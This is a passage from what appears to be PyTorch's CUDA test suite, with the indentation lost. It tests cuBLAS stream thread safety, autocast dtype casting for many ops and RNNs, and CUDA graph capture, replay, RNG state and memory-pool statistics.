def _worker(t):
my_stream = torch.cuda.Stream()
# Hard sync so we don't need to worry about creating and using tensors
# across streams or the fact that default streams are thread-local.
# Those issues are not the target of this test.
torch.cuda.synchronize()
# Line up threads to increase likelihood of race conditions.
barrier.wait()
with torch.cuda.stream(my_stream):
for i in range(test_iters):
# If all threads are sharing the same cublas handle,
# the following sequence may occur:
# thread 0 calls cublasSetStream()
# thread 1 calls cublasSetStream()
# thread 0 launches its raw gemm, which it thinks is in
# its own stream, but is actually in thread 1's stream.
# thread 0 enqueues its div_, which IS is its own stream,
# but actually now races with its gemm.
results[t] = weight.mm(results[t])
results[t].div_(float(size))
torch.cuda.synchronize()
for _ in range(trials):
for t in range(num_threads):
results[t] = torch.ones((size, size), device='cuda')
threads = [threading.Thread(target=_worker,
args=(t,)) for t in range(num_threads)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
for t in range(num_threads):
self.assertEqual(results[t].sum().item(), size * size)
def _run_autocast_outofplace(self, op, args, run_as_type, out_type=None, module=torch, add_kwargs=None):
# helper to cast args
def cast(val, to_type):
if isinstance(val, torch.Tensor):
return val.to(to_type) if val.is_floating_point() else val
elif isinstance(val, collections.abc.Iterable):
return type(val)(cast(v, to_type) for v in val)
else:
return val
if add_kwargs is None:
add_kwargs = {}
fast_dtype = torch.bfloat16 if run_as_type == torch.bfloat16 else torch.float16
self.assertFalse(torch.is_autocast_enabled())
with torch.autocast('cuda', dtype=fast_dtype):
self.assertTrue(torch.is_autocast_enabled())
out_type = out_type if out_type is not None else run_as_type
output = output_method = None
# Try module.* variant, if requested:
if module is not None and hasattr(module, op):
output = getattr(module, op)(*args, **add_kwargs)
if isinstance(output, torch.Tensor):
self.assertTrue(out_type == output.dtype,
"autocast for torch.{} produced {}, should produce {}"
.format(op, output.dtype, out_type))
# Try Tensor.* variant:
if hasattr(torch.Tensor, op):
output_method = getattr(args[0], op)(*args[1:], **add_kwargs)
if isinstance(output_method, torch.Tensor):
self.assertTrue(out_type == output_method.dtype,
"autocast for torch.{} produced {}, should produce torch.{}"
.format(op, output_method.dtype, out_type))
self.assertTrue((output is not None) or (output_method is not None),
"{} not found as an attribute on either Tensor or the requested module {}".format(
op, module))
# Accounts for ops that return Tensors, iterables, and other non-Tensors.
# For example, lstm_cell returns a tuple and equal returns bool.
def compare(first, second):
if isinstance(first, torch.Tensor):
return torch.equal(first, second)
elif isinstance(first, collections.abc.Iterable):
return all(compare(f, s) for f, s in zip(first, second))
else:
return first == second
# If both torch.* and Tensor.* variants were found, check outputs are identical
if (output is not None) and (output_method is not None):
self.assertTrue(type(output) == type(output_method))
comparison = compare(output, output_method)
self.assertTrue(comparison, "torch.{0} result did not match Tensor.{0} result".format(op))
# Compare numerics to Python-side "autocasting" that (we expect) does the same thing
# as the C++-side autocasting, and should be bitwise accurate.
output_to_compare = output if output is not None else output_method
with torch.autocast('cuda', enabled=False):
self.assertFalse(torch.is_autocast_enabled())
if module is not None and hasattr(module, op):
control = getattr(module, op)(*cast(args, run_as_type), **add_kwargs)
else:
control = getattr(args[0].to(run_as_type), op)(*cast(args[1:], run_as_type), **add_kwargs)
self.assertTrue(type(output_to_compare) == type(control))
comparison = compare(output_to_compare, control)
self.assertTrue(comparison, "torch.{} result did not match control".format(op))
self.assertTrue(torch.is_autocast_enabled())
self.assertFalse(torch.is_autocast_enabled())
def args_maybe_kwargs(self, op_with_args):
if len(op_with_args) == 2:
return op_with_args[0], op_with_args[1], {}
else:
return op_with_args[0], op_with_args[1], op_with_args[2]
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_torch_fp16(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
for op_with_args in self.autocast_lists.torch_fp16:
skip_test = False
op, args = op_with_args[0], op_with_args[1]
if len(op_with_args) == 3:
skip_test = op_with_args[2] # TEST_WITH_ROCM
if not skip_test:
self._run_autocast_outofplace(op, args, torch.float16)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_torch_bf16(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
for op_with_args in self.autocast_lists.torch_fp16:
skip_test = False
op, args = op_with_args[0], op_with_args[1]
if len(op_with_args) == 3:
skip_test = op_with_args[2] # TEST_WITH_ROCM
should_error_from_not_implemented = 'cudnn' in op or 'prelu' in op or 'thnn' in op \
or 'fused' in op or 'gru' in op or op == '_thnn_fused_lstm_cell' or op == 'lstm_cell'
if not skip_test:
if should_error_from_not_implemented:
with self.assertRaises(RuntimeError, msg=str(op) + ' should not be supported for bfloat16!'):
self._run_autocast_outofplace(op, args, torch.bfloat16)
else:
if torch.cuda.is_bf16_supported():
self._run_autocast_outofplace(op, args, torch.bfloat16)
else:
with self.assertRaisesRegex(RuntimeError, 'Device does not support bfloat16'):
self._run_autocast_outofplace(op, args, torch.bfloat16)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_torch_fp32(self):
for op_with_args in self.autocast_lists.torch_fp32:
op, args, maybe_kwargs = self.args_maybe_kwargs(op_with_args)
self._run_autocast_outofplace(op, args, torch.float32, add_kwargs=maybe_kwargs)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_torch_need_autocast_promote(self):
for op, args in self.autocast_lists.torch_need_autocast_promote:
self._run_autocast_outofplace(op, args, torch.float32)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_torch_expect_builtin_promote(self):
for op, args, out_type in self.autocast_lists.torch_expect_builtin_promote:
self._run_autocast_outofplace(op, args, torch.float32, out_type=out_type)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_nn_fp16(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
for op, args in self.autocast_lists.nn_fp16:
self._run_autocast_outofplace(op, args, torch.float16, module=torch._C._nn)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_nn_bf16(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
for op, args in self.autocast_lists.nn_fp16:
if torch.cuda.is_bf16_supported():
self._run_autocast_outofplace(op, args, torch.bfloat16, module=torch._C._nn)
else:
with self.assertRaisesRegex(RuntimeError, 'Device does not support bfloat16'):
self._run_autocast_outofplace(op, args, torch.bfloat16, module=torch._C._nn)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_nn_fp32(self):
for op, args in self.autocast_lists.nn_fp32:
self._run_autocast_outofplace(op, args, torch.float32, module=torch._C._nn)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_linalg_fp16(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
for op, args in self.autocast_lists.linalg_fp16:
self._run_autocast_outofplace(op, args, torch.float16, module=torch._C._linalg)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_methods_fp16(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
for op, args in self.autocast_lists.methods_fp16:
self._run_autocast_outofplace(op, args, torch.float16, module=None)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_methods_fp32(self):
for op, args in self.autocast_lists.methods_fp32:
self._run_autocast_outofplace(op, args, torch.float32, module=None)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_methods_expect_builtin_promote(self):
for op, args, out_type in self.autocast_lists.methods_expect_builtin_promote:
self._run_autocast_outofplace(op, args, torch.float32, module=None, out_type=out_type)
def test_autocast_banned(self):
with torch.autocast('cuda'):
for op, args, module in self.autocast_lists.banned:
with self.assertRaises(RuntimeError):
getattr(module, op)(*args)
def test_autocast_ignored_types(self):
with torch.autocast('cuda'):
for ignore_type in (torch.double, torch.int32):
a_ignore = torch.ones((8, 8), dtype=ignore_type, device="cuda:0")
b_ignore = torch.ones((8, 8), dtype=ignore_type, device="cuda:0")
c_16 = torch.ones((8, 8), dtype=torch.float16, device="cuda:0")
# Tests if CastPolicy::fp16 ops ignore double and int
# Currently, no ops belonging to this policy support integer inputs.
if ignore_type is torch.double:
with self.assertRaises(RuntimeError):
torch.mm(a_ignore, c_16)
with torch.autocast('cuda', enabled=False):
type_no_autocast = torch.mm(a_ignore, b_ignore).dtype
self.assertTrue(torch.mm(a_ignore, b_ignore).dtype is type_no_autocast)
# Tests if CastPolicy::fp32 ops ignore double and int
with torch.autocast('cuda', enabled=False):
type_no_autocast = torch.pow(a_ignore, 2.0).dtype
self.assertTrue(torch.pow(a_ignore, 2.0).dtype is type_no_autocast)
# Tests if CastPolicy::fp32_set_opt_dtype ops ignore double and int
with torch.autocast('cuda', enabled=False):
type_no_autocast = torch.sum(a_ignore).dtype
self.assertTrue(torch.sum(a_ignore).dtype is type_no_autocast)
# Tests if CastPolicy::fp32_append_dtype ops ignore double and int
# Currently, no ops belonging to this policy support integer inputs.
if ignore_type is torch.double:
with torch.autocast('cuda', enabled=False):
type_no_autocast = torch.norm(a_ignore).dtype
self.assertTrue(torch.norm(a_ignore).dtype is type_no_autocast)
def test_autocast_custom_enabled(self):
class MyMM(torch.autograd.Function):
@staticmethod
@torch.cuda.amp.custom_fwd
def forward(ctx, a, b):
self.assertTrue(a.dtype is torch.float32)
self.assertTrue(b.dtype is torch.float32)
self.assertTrue(torch.is_autocast_enabled())
ctx.save_for_backward(a, b)
return a.mm(b)
@staticmethod
@torch.cuda.amp.custom_bwd
def backward(ctx, grad):
self.assertTrue(torch.is_autocast_enabled())
a, b = ctx.saved_tensors
return grad.mm(b.t()), a.t().mm(grad)
mymm = MyMM.apply
x = torch.randn((8, 8), device="cuda", dtype=torch.float32, requires_grad=True)
y = torch.randn((8, 8), device="cuda", dtype=torch.float32, requires_grad=True)
with torch.cuda.amp.autocast():
output = mymm(x, y)
self.assertTrue(output.dtype is torch.float16)
loss = output.sum()
loss.backward()
def test_autocast_custom_cast_inputs(self):
class MyMM(torch.autograd.Function):
@staticmethod
@torch.cuda.amp.custom_fwd(cast_inputs=torch.float32)
def forward(ctx, a, container, expect_type):
b = container[1][0]
self.assertTrue(a.dtype is expect_type)
self.assertTrue(b.dtype is expect_type)
self.assertFalse(torch.is_autocast_enabled())
ctx.save_for_backward(a, b)
return a.mm(b)
@staticmethod
@torch.cuda.amp.custom_bwd
def backward(ctx, grad):
self.assertFalse(torch.is_autocast_enabled())
a, b = ctx.saved_tensors
return grad.mm(b.t()), None, None
mymm = MyMM.apply
x = torch.randn((8, 8), device="cuda", dtype=torch.float16, requires_grad=True)
# Puts one input tensor in a nested container. y's contained Tensor won't receive a gradient,
# because torch.autograd.Function can't hand gradients back to non-Tensor forward arguments.
# Sets requires_grad=False explicitly so we don't lie about expecting a gradient.
y = (0, {0: torch.randn((8, 8), device="cuda", dtype=torch.float16, requires_grad=False)})
with torch.autocast('cuda', ):
output = mymm(x, y, torch.float32)
self.assertTrue(output.dtype is torch.float32)
loss = output.sum()
loss.backward()
# Tests if custom_fwd becomes a no-op when mymm runs outside an autocast-enabled region.
output = mymm(x, y, torch.float16)
self.assertTrue(output.dtype is torch.float16)
loss = output.sum()
loss.backward()
def test_autocast_cat_jit(self):
# Reported at https://github.com/pytorch/pytorch/issues/38958
class Model(torch.nn.Module):
def forward(self):
a = torch.randn(1)
b = torch.randn(1)
c = torch.cat((a, b), 0)
d = torch.stack([c, c], 0)
return d
# The JIT here doesn't really matter, we just need to call
# cat via the boxed API
model = Model()
model_jit_script = torch.jit.script(model)
with torch.autocast('cuda', enabled=True):
model()
model_jit_script()
# cudnn RNNs require special backend handling (weights are cast to FP16 and reflattened)
# so they get a dedicated test.
# Despite the large number of RNN cases it tries, the test takes < 15 seconds on a Titan V (similar to V100).
@skipIfRocm
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_rnn(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
# seq, batch, features, hidden size
clses = ("RNN", "GRU", "LSTM")
T, B, F, H = 3, 4, 5, 6
dtypes = (torch.float16, torch.float32)
input_layouts = ("seq_first", "batch_first", "packed")
for (cls, num_layers, bias, input_layout, bidirectional, try_nonpreflattened_weights,
input_dtype, hidden_dtype, weight_dtype) in \
product(clses, (1, 2), (True, False), input_layouts, (True, False), (True, False),
dtypes, dtypes, dtypes):
if input_layout == "seq_first":
batch_first = False
x = torch.randn((T, B, F), device="cuda", dtype=input_dtype)
elif input_layout == "batch_first":
batch_first = True
x = torch.randn((B, T, F), device="cuda", dtype=input_dtype)
elif input_layout == "packed":
batch_first = False
x = torch.randn((T, B, F), device="cuda", dtype=input_dtype)
x = torch.nn.utils.rnn.pack_padded_sequence(torch.randn((T, B, F),
device="cuda", dtype=input_dtype),
lengths=(3, 2, 1, 3),
enforce_sorted=False)
rnn = getattr(torch.nn, cls)(F, H, num_layers=num_layers, bidirectional=bidirectional,
bias=bias, batch_first=batch_first).cuda().to(dtype=weight_dtype)
if try_nonpreflattened_weights:
for p in rnn.parameters():
with torch.no_grad():
p.set_(p.clone())
h = torch.randn((num_layers * (2 if bidirectional else 1), B, H),
device="cuda", dtype=hidden_dtype)
if cls == "LSTM":
c = torch.randn((num_layers * (2 if bidirectional else 1), B, H),
device="cuda", dtype=hidden_dtype)
h = (h, c)
with torch.autocast('cuda', ):
out, h_out = rnn(x, h)
out = out.data if input_layout == "packed" else out
self.assertEqual(out.dtype, torch.float16)
# Autocast wrapper requires at::_cudnn_rnn is autograd-exposed. This check can't guarantee
# at::_cudnn_rnn is autograd-exposed, but if it fires, it indicates some funny business has
# occurred and we should double check that at::_cudnn_rnn remains autograd-exposed.
self.assertEqual(out.grad_fn.name(), "CudnnRnnBackward0")
out.sum().backward()
grads = [p.grad.clone() for p in rnn.parameters()]
rnn.zero_grad()
if cls == "LSTM":
out_control, h_out_control = rnn.to(dtype=torch.float16)(x.half(), (h[0].half(), h[1].half()))
else:
out_control, h_out_control = rnn.to(dtype=torch.float16)(x.half(), h.half())
out_control = out_control.data if input_layout == "packed" else out_control
out_control.sum().backward()
grads_control = [p.grad.clone() for p in rnn.parameters()]
# Compares with default tolerances, even for FP16 execution. Barring nondeterminism,
# autocast and control results should be bitwise identical.
self.assertEqual(out, out_control)
if cls == "LSTM":
self.assertTrue(h_out[0].dtype is torch.float16 and h_out[1].dtype is torch.float16)
self.assertEqual(h_out[0], h_out_control[0])
self.assertEqual(h_out[1], h_out_control[1])
else:
self.assertEqual(h_out.dtype, torch.float16)
self.assertEqual(h_out, h_out_control)
for grad, grad_control in zip(grads, grads_control):
self.assertEqual(grad.half(), grad_control)
def test_autocast_cache_leak(self):
# Reported at https://github.com/pytorch/pytorch/issues/48049
# Test is used to check, if autocast recaches the same parameters
# when executed in a `torch.no_grad()` block.
linear = torch.nn.Linear(10, 10).to('cuda')
data = torch.randn(1, 10, device='cuda')
with torch.autocast('cuda', ):
with torch.no_grad():
out = linear(data)
first_iter_mem = torch.cuda.memory_allocated()
for _ in range(3):
out = linear(data)
self.assertTrue(first_iter_mem == torch.cuda.memory_allocated())
def test_autocast_checkpointing(self):
model = torch.nn.Sequential(torch.nn.Linear(8, 8),
torch.nn.Linear(8, 8),
torch.nn.Linear(8, 8)).cuda()
input = torch.rand((8, 8), device="cuda", dtype=torch.float16, requires_grad=True)
with torch.autocast('cuda', ):
output = checkpoint_sequential(model, 2, input)
self.assertTrue(output.requires_grad)
self.assertTrue(output.dtype is torch.float16)
output.sum().backward()
@slowTest
@unittest.skipIf(not TEST_LARGE_TENSOR, "not enough memory")
def test_max_large_axis(self):
x = torch.zeros(2**32, device='cuda', dtype=torch.int8)
x[-1] = 1
val, idx = x.max(0)
self.assertEqual(val, 1)
self.assertEqual(idx, x.shape[0] - 1)
@unittest.skipIf(not TEST_NUMPY, "Numpy not found")
def test_to_numpy(self):
self.assertRaises(TypeError, lambda: torch.empty(1, device="cuda").numpy())
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_capture_simple(self):
s = torch.cuda.Stream()
with torch.cuda.stream(s):
a = torch.full((1000,), 1, device="cuda")
g = torch.cuda.CUDAGraph()
torch.cuda.empty_cache()
g.capture_begin()
b = a
for _ in range(10):
b = b + 1
g.capture_end()
torch.cuda.current_stream().wait_stream(s)
g.replay()
self.assertTrue(b.sum().item() == 11000.)
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_rng_functional(self):
ops_with_kwargs = ((torch.nn.functional.dropout, {"p": 0.1}),
(torch.nn.functional.rrelu, {"training": True}),)
size = 10000
def run(op, kwargs):
a = torch.randn((size,), device="cuda", dtype=torch.float)
# Control
torch.cuda.manual_seed(5)
eager_out = a
for _ in range(6):
eager_out = op(eager_out, **kwargs)
graph_in = a.clone()
stream = torch.cuda.Stream()
stream.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(stream):
torch.cuda.manual_seed(5)
g = torch.cuda.CUDAGraph()
torch.cuda.empty_cache()
g.capture_begin()
graph_out = graph_in
for _ in range(2):
graph_out = op(graph_out, **kwargs)
g.capture_end()
torch.cuda.current_stream().wait_stream(stream)
# Runs a graphed->eager->graphed sequence of RNG ops.
# replay() plays 2 invocations of the op, so the sequence has 6
# invocations total, matching Control.
# replay() reads from graph_in and writes to graph_out.
g.replay()
out = op(graph_out, **kwargs)
out = op(out, **kwargs)
graph_in.copy_(out)
g.replay()
# If replay() updated RNG state correctly, graph_out
# should now hold data equal to eager_out.
try:
self.assertEqual(eager_out, graph_out)
except Exception as e:
raise RuntimeError("Failed on ", op) from e
# We hold references to all tensors used across streams up til this sync,
# so no need to call record_stream on those tensors.
torch.cuda.synchronize()
for op, kwargs in ops_with_kwargs:
run(op, kwargs)
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_rng_distributions(self):
size = 10000
input = torch.rand((size,), device="cuda", dtype=torch.float)
alloc = torch.empty((size,), device="cuda", dtype=torch.float)
# Torch ops to test with sample args (tuple) and kwargs (dict)
torch_with_args = (("bernoulli", (input.clone(),), {}),
# multinomial uses some uncapturable CUDA calls.
# TODO: reenable multinomial tests if/when the implementation is capturable.
# ("multinomial", (input.clone(), size, True), {}),
# ("multinomial", (input.clone(), size // 2, False), {}),
# TODO: reenable normal test, where std is a device
# tensor, when graph test failures are fixed
# ("normal", (input.clone() + 1, input.clone()), {}),
("normal", (input.clone() + 1, 1.0), {}),
("poisson", (input.clone(),), {}),
("rand", (size,), {"device": "cuda", "dtype": torch.float}),
("randint", (0, 3, (size,)), {"device": "cuda", "dtype": torch.float}),
("randn", (size,), {"device": "cuda", "dtype": torch.float}),)
# Tensor methods to test with sample args (tuple)
tensor_with_args = (("bernoulli_", (input.clone(),)),
("cauchy_", ()),
("exponential_", ()),
("geometric_", (0.3,)),
("log_normal_", ()),
("normal_", ()),
("random_", ()),
("uniform_", ()),)
def run(module, op, args, kwargs):
torch.cuda.manual_seed(5)
# Each path runs a dummy op to increment the state a bit before creating controls.
if (module == "torch"):
dummy = getattr(torch, op)(*args, **kwargs)
control1 = getattr(torch, op)(*args, **kwargs)
control2 = getattr(torch, op)(*args, **kwargs)
else:
dummy = alloc.clone()
control1 = alloc.clone()
control2 = alloc.clone()
getattr(dummy, op)(*args)
getattr(control1, op)(*args)
getattr(control2, op)(*args)
stream = torch.cuda.Stream()
stream.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(stream):
torch.cuda.manual_seed(5)
g = torch.cuda.CUDAGraph()
torch.cuda.empty_cache()
if (module == "torch"):
g.capture_begin()
t1 = getattr(torch, op)(*args, **kwargs)
t2 = getattr(torch, op)(*args, **kwargs)
g.capture_end()
else:
t1 = alloc.clone()
t2 = alloc.clone()
g.capture_begin()
getattr(t1, op)(*args)
getattr(t2, op)(*args)
g.capture_end()
torch.cuda.current_stream().wait_stream(stream)
try:
self.assertNotEqual(control1, t1)
self.assertNotEqual(control2, t2)
except Exception as e:
raise RuntimeError("Failed on " + module + "." + op) from e
# Runs a dummy op prelude, as for controls, to make sure replay()
# picks up the dummy op's state increment.
if module == "torch":
dummy = getattr(torch, op)(*args, **kwargs)
else:
dummy = alloc.clone()
getattr(dummy, op)(*args)
# Runs RNG ops that fill t1 and t2.
g.replay()
try:
self.assertEqual(control1, t1)
self.assertEqual(control2, t2)
except Exception as e:
raise RuntimeError("Failed on " + module + "." + op) from e
# We hold references to all tensors used across streams up til this sync,
# so no need to call record_stream on those tensors.
torch.cuda.synchronize()
for op_with_args in torch_with_args:
run("torch", *op_with_args)
for meth_with_args in tensor_with_args:
# Adds an empty dict for kwargs, which none of the Tensor methods use
run("Tensor", *(meth_with_args + ({},)))
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_two_successive(self):
torch.cuda.empty_cache()
size = 1000
kSmallBuffer = 2097152
def func_with_temps(t, val):
x = t.clone() + val
y = t.clone() + val
return x + y
s = torch.cuda.Stream()
for share_mem in ("Don't share", "via pool()", "via graph_pool_handle()"):
g0 = torch.cuda.CUDAGraph()
g1 = torch.cuda.CUDAGraph()
a = torch.ones((size,), device="cuda")
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
g0_args = (torch.cuda.graph_pool_handle(),) if share_mem == "via graph_pool_handle()" else ()
g0.capture_begin(*g0_args)
b = a.clone()
for _ in range(5):
b = func_with_temps(b, 1)
g0.capture_end()
g1_args = (g0.pool(),) if share_mem == "via pool()" else g0_args
g1.capture_begin(*g1_args)
for _ in range(5):
b = func_with_temps(b, 1)
g1.capture_end()
torch.cuda.current_stream().wait_stream(s)
# mixes unrelated eager ops with replays
c = a.clone()
for _ in range(2):
c = func_with_temps(c, 3)
g0.replay()
for _ in range(2):
c = func_with_temps(c, 3)
g1.replay()
for _ in range(2):
c = func_with_temps(c, 3)
self.assertEqual(b.sum().item(), size * 3070)
self.assertEqual(c.sum().item(), size * 442)
if share_mem != "Don't share":
self.assertEqual(reserved_no_sharing - torch.cuda.memory_stats()["reserved_bytes.all.current"],
kSmallBuffer)
else:
reserved_no_sharing = torch.cuda.memory_stats()["reserved_bytes.all.current"]
del a, b, c, g0, g1
# Tensors used across streams (a and b) were held until just now, so no need to call record_stream on them.
torch.cuda.synchronize()
torch.cuda.empty_cache()
@unittest.skip("Temporarily disabled due to a graphs bug in libcuda.so, " +
"see https://github.com/pytorch/pytorch/pull/57556")
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_concurrent_replay(self):
torch.cuda.empty_cache()
size = 1000000 # largeish to help expose race conditions
def func_with_temps(t, val):
x = t.clone() + val
y = t.clone() + val
return x + y
s = torch.cuda.Stream()
for share_mem in ("Don't share", "via pool()", "via graph_pool_handle()"):
g0 = torch.cuda.CUDAGraph()
g1 = torch.cuda.CUDAGraph()
s0 = torch.cuda.Stream()
s1 = torch.cuda.Stream()
a = torch.ones((size,), device="cuda")
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
g0_args = (torch.cuda.graph_pool_handle(),) if share_mem == "via graph_pool_handle()" else ()
g0.capture_begin(*g0_args)
b = a.clone()
for _ in range(5):
b = func_with_temps(b, 1)
g0.capture_end()
g1_args = (g0.pool(),) if share_mem == "via pool()" else g0_args
g1.capture_begin(*g1_args)
c = a.clone()
for _ in range(5):
c = func_with_temps(c, 2)
g1.capture_end()
# To reproduce data corruption, I need g0 and g1's kernels to run concurrently.
# But replay() (especially cudaGraphLaunch) can incur significant CPU overhead.
# The following pattern helps align device-side execution of g0 and g1's kernels.
torch.cuda.synchronize()
with torch.cuda.stream(s0):
torch.cuda._sleep(1000000)
s1.wait_stream(s0)
g0.replay()
with torch.cuda.stream(s1):
g1.replay()
torch.cuda.current_stream().wait_stream(s0)
torch.cuda.current_stream().wait_stream(s1)
if share_mem != "Don't share":
# Confirms concurrent replays using the same mempool corrupted each other.
self.assertNotEqual(b.sum().item(), size * 94)
self.assertNotEqual(c.sum().item(), size * 156)
else:
# Confirms concurrent replays using different mempools did not corrupt each other.
self.assertEqual(b.sum().item(), size * 94)
self.assertEqual(c.sum().item(), size * 156)
del a, b, c, g0, g1
# Tensors used across streams (a, b, c) were held until just now, so no need to call record_stream on them.
torch.cuda.synchronize()
torch.cuda.empty_cache()
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_three_successive(self):
torch.cuda.empty_cache()
size = 1000
s = torch.cuda.Stream()
for share_mem in ("Don't share", "via pool()", "via graph_pool_handle()"):
a = torch.ones((size,), device="cuda")
g0 = torch.cuda.CUDAGraph()
g1 = torch.cuda.CUDAGraph()
g2 = torch.cuda.CUDAGraph()
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
g0_args = (torch.cuda.graph_pool_handle(),) if share_mem == "via graph_pool_handle()" else ()
g0.capture_begin(*g0_args)
b = a.clone()
c = b + 1
d = b + 2
g0.capture_end()
args = (g0.pool(),) if share_mem == "via pool()" else g0_args
g1.capture_begin(*args)
e = c + 3
del c
g1.capture_end()
g2.capture_begin(*args)
f = d + 4
g2.capture_end()
torch.cuda.current_stream().wait_stream(s)
# Tests that replaying in capture order is valid
g0.replay()
g1.replay()
g2.replay()
self.assertEqual(e.sum().item(), size * 5)
self.assertEqual(f.sum().item(), size * 7)
# Tests that replaying as g0, g2, g1 is only valid if they don't share a pool
g0.replay()
g2.replay()
g1.replay()
# If share_mem is True, g2's capture should have reused c's memory for f. We replayed g2 then g1,
# so we expect g1's captured "e = c + 3" mistakenly filled e with "f's vals + 3".
self.assertEqual(e.sum().item(), size * (7 + 3) if share_mem != "Don't share" else size * 5)
self.assertEqual(f.sum().item(), size * 7)
del a, b, d, e, f, g0, g1, g2
# Tensors used across streams (a, e, f) were held until just now, so no need to call record_stream on them.
torch.cuda.synchronize()
torch.cuda.empty_cache()
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_memory_stats_and_use_result_after_destroy_graph(self):
kSmallSize = 1048576
kSmallBuffer = 2097152
kLargeBuffer = 20971520
kMinLargeAlloc = 10485760
kRoundLarge = 2097152
elem = 4
# this was annoying to write but stresses the expectations pretty rigorously
cases = ((512 // elem, 1, kSmallBuffer, kSmallBuffer, "small_pool"),
(kSmallSize // elem, 2, 2 * kSmallBuffer, kSmallBuffer, "small_pool"),
((kSmallSize + 512) // elem, 1, kLargeBuffer, kLargeBuffer, "large_pool"),
((kMinLargeAlloc - 512) // elem, 2, 2 * kLargeBuffer, kLargeBuffer, "large_pool"),
((kMinLargeAlloc + 512) // elem, 3,
3 * (kRoundLarge * ((kMinLargeAlloc + 512 + kRoundLarge - 1) // kRoundLarge)),
kRoundLarge * ((kMinLargeAlloc + 512 + kRoundLarge - 1) // kRoundLarge),
"large_pool"),)
stats_to_check = ("segment.",
"reserved_bytes.",
"active.",
"active_bytes.")
gc.collect()
torch.cuda.empty_cache()
s = torch.cuda.Stream()
for (numel,
delta_cudaMallocs,
delta_cudaMalloc_bytes,
delta_cudaMalloc_bytes_post_del_g,
pool_string) in cases:
if pool_string == "small_pool":
delta_active_blocks = 2 # one from "b" plus a sneaky one from CUDAGraph's one-element rng offset holder
delta_active_bytes = numel * elem + 512 # + 512 for CUDAGraph's rng offset holder
else:
delta_active_blocks = 1 # We only check the large pool, which isn't affected by rng offset holder
delta_active_bytes = numel * elem
g = torch.cuda.CUDAGraph()
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
# Allocation stat estimates assume input is created on the same stream as capture_begin()
# (in other words, the same stream silo as the rng offset holder, which is not allocated from the
# capture's private pool).
a = torch.ones((numel,), device="cuda")
precapture_stats = torch.cuda.memory_stats()
g.capture_begin()
b = a.clone()
for _ in range(5):
b = b.clone() + 1
g.capture_end()
torch.cuda.current_stream().wait_stream(s)
gc.collect()
postcapture_stats = torch.cuda.memory_stats()
expecteds = (delta_cudaMallocs,
delta_cudaMalloc_bytes,
delta_active_blocks,
delta_active_bytes)
# Double checks replay and stats before and after a call to empty_cache
for i in range(2):
for stat, expected in zip(stats_to_check, expecteds):
stat = stat + pool_string + ".current"
current = postcapture_stats[stat] - precapture_stats[stat]
self.assertEqual(current, expected, "Pre to post capture delta of " +
stat + " = {}, expected = {}, numel = {}".format(current, expected, numel))
g.replay()
self.assertEqual(b.sum().item(), 6 * numel)
if i == 0:
torch.cuda.empty_cache()
del g
gc.collect()
torch.cuda.empty_cache()
postdel_stats = torch.cuda.memory_stats()
# Uses graph result b after graph has been deleted
self.assertEqual(b.sum().item(), 6 * numel)
# b should be the only live reference remaining from the graph's private pool
expecteds = (1, delta_cudaMalloc_bytes_post_del_g, 1, numel * elem)
for stat, expected in zip(stats_to_check, expecteds):
stat = stat + pool_string + ".current"
current = postdel_stats[stat] - precapture_stats[stat]
self.assertEqual(current, expected, "Pre capture to post graph delete delta of " +
stat + " = {}, expected = {}, numel = {}".format(current, expected, numel))
# del a, b before the next case is essential, otherwise overwriting a and b in the next case
# can throw off its allocation/deallocation counts.
del a, b
# Tensors used across streams (a and b) were held until just now, so no need to call record_stream on them.
torch.cuda.synchronize()
torch.cuda.empty_cache()
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
